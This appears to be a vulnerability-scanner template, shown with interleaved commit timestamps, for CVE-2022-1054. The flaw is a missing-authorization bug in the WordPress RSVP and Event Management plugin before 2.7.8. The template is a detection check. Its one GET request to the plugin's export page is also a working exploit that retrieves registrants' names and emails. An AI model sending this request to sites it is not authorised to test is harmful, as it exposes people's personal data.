2022-04-20 22:51:08 +00:00
id : CVE-2022-1054
info :
2023-04-06 21:30:22 +00:00
name : WordPress RSVP and Event Management <2.7.8 - Missing Authorization
2022-04-20 22:51:08 +00:00
author : Akincibor
severity : medium
2023-04-06 22:39:30 +00:00
description : WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
2022-04-20 22:51:08 +00:00
reference :
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
2022-04-22 16:29:43 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
2022-04-22 16:29:43 +00:00
cve-id : CVE-2022-1054
cwe-id : CWE-862
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:*:*:*
epss-score : 0.00349
2022-08-27 04:41:18 +00:00
tags : wordpress,cve,cve2022,wpscan,wp,wp-plugin
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-04-20 22:51:08 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-20 22:51:08 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'RSVP Status'
2022-04-22 13:27:48 +00:00
- '"First Name"'
condition : and
2022-04-20 22:51:08 +00:00
- type : status
status :
- 200